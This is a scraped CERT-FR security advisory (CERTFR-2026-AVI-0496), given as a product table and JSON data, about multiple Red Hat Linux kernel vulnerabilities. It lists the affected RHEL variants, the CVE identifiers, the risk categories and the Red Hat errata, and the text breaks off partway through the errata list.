| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for ARM 64 9 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Update Support 9.6 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Life Cycle 8.10 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.6 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - Extended Life Cycle 9.6 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Life Cycle 9.2 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.6 aarch64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 9.6 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.0 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - Extended Life Cycle 8.10 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.6 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 8 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 10 aarch64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for ARM 64 8 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian - Extended Update Support 10.0 ppc64le | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 9.6 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Real Time for NFV 8 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.6 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.6 ppc64le | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for x86_64 8 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 10.0 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.6 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.2 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - Extended Life Cycle 8.10 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems 9 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 10.0 s390x | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - AUS 9.2 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for ARM 64 10 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - AUS 8.2 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - Extended Life Cycle Support for IBM Power, big endian 7 ppc64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 10.0 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.6 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 9.6 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.4 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 9.6 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian - Extended Life Cycle 8.10 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian 9 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - Extended Life Cycle Support for IBM Power, little endian 7 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.8 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for Power, little endian 8 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.8 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - Extended Life Cycle 9.2 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.2 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems 10 s390x | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for x86_64 9 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 9 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian 10 ppc64le | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for Power, little endian 10 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.2 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.6 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 10.0 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - Extended Update Support 10.0 aarch64 |
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Life Cycle 9.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 8.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 10.0 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian 8 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Life Cycle 9.2 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 8.4 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems 8 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.0 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 10.0 s390x",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 8 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - TUS 8.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems 9 s390x",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - Extended Life Cycle Support (for IBM z Systems) 7 s390x",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.0 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Life Cycle 9.2 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 10 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Life Cycle 9.6 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - TUS 8.8 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Real Time 8 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.6 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support 10.0 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.8 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.0 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - 4 years of updates 10.0 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 9 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 10.0 ppc64le",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 9.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Life Cycle 9.6 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 10 x86_64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian 9 ppc64le",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems 10 s390x",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - 4 years of support 10.0 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - Extended Life Cycle Support 7 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 9 aarch64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support 9.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Life Cycle 8.10 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.6 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Life Cycle 9.6 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Life Cycle 9.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.6 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 9.6 ppc64le",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.0 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Life Cycle 8.10 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.6 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 8 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 10 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 8 aarch64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Update Support 10.0 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 9.6 s390x",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Real Time for NFV 8 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.6 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.6 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 8 x86_64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 10.0 aarch64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.2 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Life Cycle 8.10 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems 9 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 10.0 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 9.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 10 aarch64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 8.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - Extended Life Cycle Support for IBM Power, big endian 7 ppc64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 10.0 x86_64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 9.6 aarch64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.4 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 9.6 x86_64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Life Cycle 8.10 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian 9 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - Extended Life Cycle Support for IBM Power, little endian 7 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.8 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian 8 ppc64le",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.8 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Life Cycle 9.2 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.2 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems 10 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 9 x86_64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 9 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian 10 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian 10 ppc64le",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.2 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 10.0 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Update Support 10.0 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-40064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40064"
},
{
"name": "CVE-2025-68741",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68741"
},
{
"name": "CVE-2026-23066",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23066"
},
{
"name": "CVE-2026-23209",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23209"
},
{
"name": "CVE-2025-38024",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38024"
},
{
"name": "CVE-2026-23204",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23204"
},
{
"name": "CVE-2026-23191",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23191"
},
{
"name": "CVE-2025-39981",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39981"
},
{
"name": "CVE-2026-23216",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23216"
},
{
"name": "CVE-2023-53539",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53539"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2026-23193",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23193"
},
{
"name": "CVE-2025-40168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40168"
},
{
"name": "CVE-2026-23144",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23144"
},
{
"name": "CVE-2025-39766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39766"
},
{
"name": "CVE-2022-50053",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50053"
},
{
"name": "CVE-2026-23156",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23156"
},
{
"name": "CVE-2026-23171",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23171"
},
{
"name": "CVE-2025-38180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38180"
},
{
"name": "CVE-2026-23111",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23111"
},
{
"name": "CVE-2026-23231",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23231"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2025-71238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71238"
},
{
"name": "CVE-2025-38248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38248"
}
],
"initial_release_date": "2026-04-24T00:00:00",
"last_revision_date": "2026-04-24T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0496",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-04-24T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Ex\u00e9cution de code arbitraire"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de Red Hat. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de Red Hat",
"vendor_advisories": [
{
"published_at": "2026-04-22",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9515",
"url": "https://access.redhat.com/errata/RHSA-2026:9515"
},
{
"published_at": "2026-04-20",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9112",
"url": "https://access.redhat.com/errata/RHSA-2026:9112"
},
{
"published_at": "2026-04-22",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9643",
"url": "https://access.redhat.com/errata/RHSA-2026:9643"
},
{
"published_at": "2026-04-22",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9644",
"url": "https://access.redhat.com/errata/RHSA-2026:9644"
},
{
"published_at": "2026-04-22",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9513",
"url": "https://access.redhat.com/errata/RHSA-2026:9513"
},
{
"published_at": "2026-04-21",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9264",
"url": "https://access.redhat.com/errata/RHSA-2026:9264"
},
{
"published_at": "2026-04-22",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9512",
"url": "https://access.redhat.com/errata/RHSA-2026:9512"
},
{
"published_at": "2026-04-20",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9135",
"url": "https://access.redhat.com/errata/RHSA-2026:9135"
},
{
"published_at": "2026-04-20",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9095",
"url": "https://access.redhat.com/errata/RHSA-2026:9095"
},
{
"published_at": "2026-04-22",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9835",
"url": "https://access.redhat.com/errata/RHSA-2026:9835"
},
{
"published_at": "2026-04-20",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9131",
"url": "https://access.redhat.com/errata/RHSA-2026:9131"
},
{
"published_at": "2026-04-20",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:8921",
"url": "https://access.redhat.com/errata/RHSA-2026:8921"
},
{
"published_at": "2026-04-22",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9870",
